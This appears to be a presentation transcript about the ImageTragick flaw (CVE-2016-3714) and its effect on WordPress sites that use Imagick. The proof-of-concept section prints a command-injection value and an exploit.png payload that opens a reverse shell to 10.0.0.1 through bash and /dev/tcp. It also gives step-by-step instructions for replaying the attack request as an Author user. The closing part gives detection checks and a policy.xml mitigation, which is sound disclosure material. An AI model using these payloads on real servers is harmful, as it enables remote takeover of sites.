remote code execute wordpress
TRANSCRIPT
ImageMagick
Imagick is a native php extension to create and modify images
using the ImageMagick API.
ImageMagick is a software suite to create, edit, and compose
bitmap images. It can read, convert and write images in a variety of
formats (over 100) including DPX, EXR, GIF, JPEG, JPEG-2000, PDF,
PhotoCD, PNG, Postscript, SVG, and TIFF.
Image Magick Vulnerability Information
A few days ago an Image Magick vulnerability was disclosed CVE-
2016-3714
This vulnerability resolve pictures from Magiccore/constitute.c of
ReadImage Function , if the image address is https:// at the
beginning ,that call InvokeDelegate
Exploit ImageMagick
One of the default delegate commands uses the following to
handle HTTPS requests:
"wget" -q -O "%o" "https:%M”
where %M is the actual link from the input. It is possible to pass the
value like:
example.com"|ls "-la
How is WordPress affected?
WordPress select a Library for Editing Images. WordPress image
processing use Imagick Library by default.
How is WordPress affected?
If WordPress Select Imagick Library Then Load it.
How is WordPress affected?
get_attached_file function in wp_crop_image function invoke system
function mentioned in library
Poc
Upload an normal image format
With Author permissions login to account, publish an article, insert
the Media.
Poc
Create exploit.png file :
push graphic-context
viewbox 0 0 640 480
fill 'url (https://example.com/image.jpg "|bash -i >& /dev/tcp/10.0.0.1/8080 0>&1”)'
pop graphic-context
Upload Exploit.png and add to Post
poc
click on our normal picture , select Edit , then edit Orginal
poc
Rotate/Crop image then ‘Copy as
cURL’ the invoked link.
poc
Then click the broken image
Edit and Edit Original, check
requests listed on network
and find admin-ajax.php
see requests with ‘post’
type, copy _ajax_nonceAnd postid parameter.
poc
Paste New Parameters from Broken Image to Curl Command mentioned before
Proof of Concept By Getting Connect Back
(Change bash command As you wish)
How do I know if my site is
vulnerable?
Inspect the output of the phpinfo() function for “Imagick”.
Run php -m | grep imagick on the command line.
How do I patch the vulnerability?
Currently the best known fix is to add a policy.xml file to your ImageMagick
installation to limit the delegates that ImageMagick will use. Due to the ongoing
nature of this issue, we recommend you refer to and follow
https://imagetragick.com/ for instructions on how to handle the problem.
Documentation on the policy.xml file can be found at
https://www.imagemagick.org/script/resources.php.
Refrance:
http://www.imagemagick.org/
https://make.wordpress.org/core/2016/05/06/imagemagick-
vulnerability-information/
https://access.redhat.com/security/vulnerabilities/2296071
http://www.secpulse.com/archives/45802.html
End